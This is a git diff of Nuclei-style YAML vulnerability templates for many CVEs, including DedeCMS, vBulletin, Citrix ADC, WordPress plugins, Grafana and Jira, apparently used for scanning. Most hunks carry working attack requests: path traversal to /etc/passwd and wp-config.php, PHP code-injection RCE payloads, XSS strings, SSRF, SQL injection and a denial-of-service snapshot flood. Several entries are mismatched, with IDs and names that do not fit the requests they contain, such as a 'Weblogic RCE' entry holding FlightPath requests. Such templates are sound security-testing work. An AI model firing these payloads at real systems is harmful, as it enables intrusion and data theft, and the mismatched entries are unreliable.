cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-5233 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2018-6910.yaml b/poc/cve/CVE-2018-6910.yaml index 806d1a98c2..03cc1ee5c9 100644 --- a/poc/cve/CVE-2018-6910.yaml +++ b/poc/cve/CVE-2018-6910.yaml @@ -1,27 +1,14 @@ id: CVE-2018-6910 info: - name: DedeCMS 5.7 - Path Disclosure + name: DedeCMS 5.7 path disclosure author: pikpikcu - severity: high + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910 description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md - - https://kongxin.gitbook.io/dedecms-5-7-bug/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-6910 - cwe-id: CWE-668 - cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* - epss-score: 0.03033 tags: cve,cve2018,dedecms - metadata: - max-request: 1 -http: +requests: - method: GET path: - "{{BaseURL}}/include/downmix.inc.php" @@ -39,5 +26,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/poc/cve/CVE-2018-7700.yaml b/poc/cve/CVE-2018-7700.yaml index de3d622d4c..7ecfd09be8 100644 --- a/poc/cve/CVE-2018-7700.yaml +++ b/poc/cve/CVE-2018-7700.yaml @@ -1,27 +1,38 @@ id: CVE-2018-7700 info: - name: DedeCMS V5.7SP2 RCE + name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution author: pikpikcu severity: high - reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + description: | + DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + reference: + - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 tags: cve,cve2018,dedecms,rce + metadata: + max-request: 1 -requests: +http: - method: GET path: - - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}" matchers-condition: and matchers: - type: word - words: - - "phpinfo" - - "PHP Version" part: body - condition: and + words: + - "4cc32a3a81d2bb37271934a48ce4468a" - type: status status: - 200 + +# Enhanced by mp on 2022/06/16 diff --git a/poc/cve/CVE-2018-8033.yaml b/poc/cve/CVE-2018-8033.yaml index 55f1fd7a8c..8904dd11ea 100644 --- a/poc/cve/CVE-2018-8033.yaml +++ b/poc/cve/CVE-2018-8033.yaml @@ -6,13 +6,6 @@ info: severity: high description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 tags: cve,cve2018,apache,ofbiz,xxe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2018-8033 - cwe-id: CWE-200 - reference: - - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E requests: - raw: diff --git a/poc/cve/CVE-2019-13396.yaml b/poc/cve/CVE-2019-13396.yaml index c6ef0512e4..baf97b5f61 100644 --- a/poc/cve/CVE-2019-13396.yaml +++ b/poc/cve/CVE-2019-13396.yaml @@ -1,51 +1,40 @@ -id: CVE-2019-13396 +id: CVE-2019-1336 info: - name: FlightPath Local File Inclusion - author: 0x_Akoko,daffainfo - severity: medium - description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. - reference: - - https://www.exploit-db.com/exploits/47121 - - https://www.cvedetails.com/cve/CVE-2019-13396/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 - - http://getflightpath.com/node/2650 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-13396 - cwe-id: CWE-22 - tags: cve,cve2019,flightpath,lfi + name: Weblogic RCE GET request + author: medbsq + severity: critical + # link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf + requests: - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D¤t_student_id=&user=test&password=test&btn_submit=Login - callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd + - | + POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd + matchers-condition: and matchers: - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token part: body - group: 1 - internal: true regex: - - "idden' name='form_token' value='([a-z0-9]+)'>" + - "root:[x*]:0:0:" \ No newline at end of file diff --git a/poc/cve/CVE-2019-14205.yaml b/poc/cve/CVE-2019-14205.yaml index 17d3999981..f1cfd7b265 100644 --- a/poc/cve/CVE-2019-14205.yaml +++ b/poc/cve/CVE-2019-14205.yaml @@ -1,45 +1,24 @@ -id: CVE-2019-14205 - +id: CVE-2019-14205-1 info: - name: Multiples Wordpress LFI - author: medbsq - severity: critical -# https://www.cvebase.com/cve/2019/14205 + name: WordPress Ext Adaptive Images LFI + author: pikpikcu + severity: high + tags: cve,cve2019,wordpress,wp-plugin,lfi + reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + requests: - - method: POST + - method: GET path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download" - - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php" - - "{{BaseURL}}/?aam-media=wp-config.php" - - "{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php" - - "{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php" - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php" - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php" - - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - - - matchers-condition: or + - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' + + matchers-condition: and matchers: - type: word words: - - "DB_USER" + - "DB_NAME" - "DB_PASSWORD" + part: body condition: and - - type: word - words: - - "root:" - - "bin:x:" - condition: and - part: body \ No newline at end of file + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-15043.yaml b/poc/cve/CVE-2019-15043.yaml index 5c6553f16d..2a4be1541c 100644 --- a/poc/cve/CVE-2019-15043.yaml +++ b/poc/cve/CVE-2019-15043.yaml @@ -1,59 +1,23 @@ id: CVE-2019-15043 - info: - name: Grafana - Improper Access Control - author: Joshua Rogers - severity: high - description: | - Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service. - reference: - - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 - - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - - https://bugzilla.redhat.com/show_bug.cgi?id=1746945 - - https://aaron-hoffmann.com/posts/cve-2019-15043/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043 - - https://nvd.nist.gov/vuln/detail/CVE-2019-15043 - remediation: Upgrade to 6.3.4 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2019-15043 - cwe-id: CWE-284 - metadata: - max-request: 1 - shodan-query: title:"Grafana" - verified: "true" - tags: cve,cve2019,grafana,dos,intrusive - -variables: - payload: '{{repeat("A", 4000)}}' - -http: - - method: POST - path: - - "{{BaseURL}}/api/snapshots" + author: bing0o + name: Grafana unauthenticated API + severity: medium +requests: + - body: >- + {"dashboard": + {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": + [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": + 3600} headers: Content-Type: application/json - body: '{"dashboard": {"name":"{{payload}}"}}' - - matchers-condition: and + Host: '{{Hostname}}' + User-Agent: Mozilla/5.0 matchers: - - type: word - part: body - words: - - '"deleteUrl":' - - '"deleteKey":' - - '"key":' - - '"url":' - condition: and - - - type: word - part: header + - part: body + type: word words: - - "application/json" - - - type: status - status: - - 200 - -# Enhanced by md on 2023/04/12 + - deleteKey + method: POST + path: + - '{{BaseURL}}/api/snapshots' diff --git a/poc/cve/CVE-2019-16759.yaml b/poc/cve/CVE-2019-16759.yaml index 7e878320ed..329277e986 100644 --- a/poc/cve/CVE-2019-16759.yaml +++ b/poc/cve/CVE-2019-16759.yaml @@ -1,25 +1,46 @@ id: CVE-2019-16759 info: - name: 0day RCE in vBulletin v5.0.0-v5.5.4 - author: dwisiswant0 - severity: high + name: vBulletin 5.0.0-5.5.4 - Remote Command Execution + author: madrobot + severity: critical + description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ + - https://seclists.org/fulldisclosure/2019/Sep/31 + - https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-16759 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-16759 + cwe-id: CWE-94 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-score: 0.97528 + metadata: + max-request: 1 + shodan-query: http.component:"vBulletin" + verified: "true" + tags: cve,cve2019,rce,kev,seclists,vbulletin -requests: +http: - raw: - | - POST /index.php?routestring=ajax/render/widget_php HTTP/1.1 + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit; - - | - POST / HTTP/1.1 + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B - {"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"} matchers-condition: and matchers: + + - type: word + words: + - "addcc9f9f2f40e2e6aca3079b73d9d17" + - type: status status: - 200 - - type: word - words: - - "nonexistent:1337" + +# Enhanced by md on 2023/03/20 diff --git a/poc/cve/CVE-2019-16997.yaml b/poc/cve/CVE-2019-16997.yaml index 17de819532..51cf381a35 100644 --- a/poc/cve/CVE-2019-16997.yaml +++ b/poc/cve/CVE-2019-16997.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter. + remediation: | + Upgrade to a patched version of Metinfo or apply the necessary security patches to mitigate the SQL Injection vulnerability. reference: - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-16997 @@ -13,9 +15,16 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 + epss-score: 0.24401 + epss-percentile: 0.96156 + cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: metinfo + product: metinfo tags: metinfo,sqli,cve,cve2019 -requests: +http: - raw: - | POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1 @@ -26,6 +35,7 @@ requests: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -37,4 +47,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/06/14 +# digest: 490a004630440220530e338d4b454bae6e416c402368e4b09d12d51bec871f16084987ed9e4a73b1022016b50bae9b5e55a9e7254b47ef9a6964e0591c8f80b7f15a41fbbeccc3f0c06c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-19781.yaml b/poc/cve/CVE-2019-19781.yaml index fc56780fbf..c9c986166b 100644 --- a/poc/cve/CVE-2019-19781.yaml +++ b/poc/cve/CVE-2019-19781.yaml @@ -1,38 +1,15 @@ id: CVE-2019-19781 info: - name: Citrix ADC and Gateway - Directory Traversal - author: organiccrap,geeknik - severity: critical - description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities. - reference: - - https://support.citrix.com/article/CTX267027 - - https://nvd.nist.gov/vuln/detail/CVE-2019-19781 - - https://www.kb.cert.org/vuls/id/619785 - - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-19781 - cwe-id: CWE-22 - epss-score: 0.97542 - metadata: - max-request: 1 - tags: lfi,kev,packetstorm,cve,cve2019,citrix + name: Citrix ADC Directory Traversal + author: organiccrap + severity: high -http: +requests: - method: GET path: - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" - - matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "[global]" - -# Enhanced by mp on 2022/05/03 diff --git a/poc/cve/CVE-2019-19985.yaml b/poc/cve/CVE-2019-19985.yaml index 7fd75869d3..da9611d488 100644 --- a/poc/cve/CVE-2019-19985.yaml +++ b/poc/cve/CVE-2019-19985.yaml @@ -1,11 +1,17 @@ -id: CVE-2019-19985-1 +id: CVE-2019-19985 info: name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download - author: KBA@SOGETI_ESEC, madrobot & dwisiswant0 + author: KBA@SOGETI_ESEC,madrobot,dwisiswant0 severity: medium + description: The WordPress plugin, Email Subscribers & Newsletters, before 4.2.3 had a flaw that allowed unauthenticated file download with user information disclosure. reference: https://www.exploit-db.com/exploits/48698 tags: cve,cve2019,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-19985 + cwe-id: CWE-862 requests: - method: GET diff --git a/poc/cve/CVE-2019-20141.yaml b/poc/cve/CVE-2019-20141.yaml index 43d20edb98..dd523ce89a 100644 --- a/poc/cve/CVE-2019-20141.yaml +++ b/poc/cve/CVE-2019-20141.yaml @@ -5,13 +5,7 @@ info: author: knassar702 severity: medium description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter. - reference: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html tags: cve,cve2019,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-20141 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2019-5418.yaml b/poc/cve/CVE-2019-5418.yaml index 282d18d0cc..aa88fe20e3 100644 --- a/poc/cve/CVE-2019-5418.yaml +++ b/poc/cve/CVE-2019-5418.yaml @@ -1,4 +1,4 @@ -id: CVE-2019-5418 +id: CVE-2019-5418-3 info: name: Rails Information Leak diff --git a/poc/cve/CVE-2019-6112.yaml b/poc/cve/CVE-2019-6112.yaml index 5b12bbdb90..651caad780 100644 --- a/poc/cve/CVE-2019-6112.yaml +++ b/poc/cve/CVE-2019-6112.yaml @@ -5,13 +5,7 @@ info: author: dwisiswant0 severity: medium description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field). - reference: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b tags: cve,cve2019,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2019-6112 - cwe-id: CWE-79 requests: - method: GET diff --git a/poc/cve/CVE-2019-7256.yaml b/poc/cve/CVE-2019-7256.yaml index d5fb7ff1cf..35b95c1ccd 100644 --- a/poc/cve/CVE-2019-7256.yaml +++ b/poc/cve/CVE-2019-7256.yaml @@ -1,15 +1,13 @@ -id: CVE-2019-7256 +id: cve-2019-7256 info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical - description: Linear eMerge E3-Series devices allow Command Injections. - reference: https://www.exploit-db.com/exploits/47619 - tags: cve,cve2019,emerge,rce # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ +# Refrence: https://www.exploit-db.com/exploits/47619 requests: - raw: # Default Port @@ -19,6 +17,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 @@ -28,6 +27,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 @@ -39,4 +39,4 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" diff --git a/poc/cve/CVE-2019-8451.yaml b/poc/cve/CVE-2019-8451.yaml index 4f4aca0d1f..633704f7ad 100644 --- a/poc/cve/CVE-2019-8451.yaml +++ b/poc/cve/CVE-2019-8451.yaml @@ -2,34 +2,30 @@ id: CVE-2019-8451 info: name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource - author: TechbrunchFR + author: "TechbrunchFR" severity: medium - description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class. - reference: - - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - - https://jira.atlassian.com/browse/JRASERVER-69793 - - https://hackerone.com/reports/713900 - tags: cve,cve2019,atlassian,jira,ssrf,oast - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.50 - cve-id: CVE-2019-8451 - cwe-id: CWE-918 -requests: - - method: POST - path: - - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' +# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important +# security issue reported in August 2019. - body: | - url=https://{{Host}}:443@{{interactsh-url}} +# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in +# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class. +# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable +# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal +# network resources. +# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in +# https://twitter.com/benmontour/status/1177250393220239360 +# https://twitter.com/ojensen5115/status/1176569607357730817 +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' headers: - X-Atlassian-Token: no-check - Content-Type: application/x-www-form-urlencoded - + X-Atlassian-token: no-check matchers: - type: word - part: interactsh_protocol + name: ssrf-response-body words: - - "http" # Confirms the HTTP Interaction + - '

This domain is for use in illustrative examples in documents.' + part: body diff --git a/poc/cve/CVE-2020-10199.yaml b/poc/cve/CVE-2020-10199.yaml index 21a289174a..94ec25d713 100644 --- a/poc/cve/CVE-2020-10199.yaml +++ b/poc/cve/CVE-2020-10199.yaml @@ -1,24 +1,24 @@ id: CVE-2020-2199 info: - name: Nexus Repository Manager RCE + name: Jenkins Subversion Partial Release Manager XSS author: medbsq - severity: high -#https://www.cvebase.com/cve/2020/10199 + severity: medium + requests: - method: POST path: - - "{{BaseURL}}/rest/beta/repositories/go/group" + - "{{BaseURL}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - Content-Type: application/json - body: "{\"name\": \"internal\",\"online\": true,\"storage\": {\"blobStoreName\": \"default\",\"strictContentTypeValidation\": true},\"group\": {\"memberNames\": [\"$\\c{ 1337 * 1337 }\"]}}" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word words: - - "1787569" - part: body + - "pwn.seam" + - "?pwned=" + condition: and + part: header - type: status status: - - 400 + - 200 diff --git a/poc/cve/CVE-2020-11738.yaml b/poc/cve/CVE-2020-11738.yaml index 280607b065..6b169370b6 100644 --- a/poc/cve/CVE-2020-11738.yaml +++ b/poc/cve/CVE-2020-11738.yaml @@ -1,4 +1,5 @@ id: CVE-2020-11738 + info: name: WordPress Duplicator plugin Directory Traversal author: dwisiswant0 @@ -9,17 +10,11 @@ info: According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before. - reference: + + References: - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild - - https://snapcreek.com/duplicator/docs/changelog/?lite - - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/ - - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-11738 - cwe-id: CWE-22 - tags: cve,cve2020,wordpress,wp-plugin,lfi,kev + tags: cve,cve2020,wordpress,wp-plugin,lfi + requests: - method: GET path: @@ -39,7 +34,7 @@ requests: part: header - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'" condition: or - part: body + part: body \ No newline at end of file diff --git a/poc/cve/CVE-2020-13483.yaml b/poc/cve/CVE-2020-13483.yaml index 93175bfeeb..7f6b791d4b 100644 --- a/poc/cve/CVE-2020-13483.yaml +++ b/poc/cve/CVE-2020-13483.yaml @@ -2,29 +2,40 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS - author: pikpikcu - severity: high - reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 + author: pikpikcu,3th1c_yuk1 + severity: medium description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + reference: + - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 + - https://twitter.com/brutelogic/status/1483073170827628547 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 tags: cve,cve2020,xss,bitrix requests: - method: GET path: + - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>' - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: + - '*/)});function __MobileAppList(){alert(1)}//' - "function(handler){};function __MobileAppList(test){alert(document.domain);};//" - part: body + condition: or - type: word + part: header words: - text/html - part: header - type: status status: diff --git a/poc/cve/CVE-2020-13700.yaml b/poc/cve/CVE-2020-13700.yaml index 645363a779..42d1d0f6e1 100644 --- a/poc/cve/CVE-2020-13700.yaml +++ b/poc/cve/CVE-2020-13700.yaml @@ -6,10 +6,15 @@ info: severity: high reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 description: | - An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. - It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a - wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. - tags: cve,cve2020,wordpress + An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. + It allows an insecure direct object 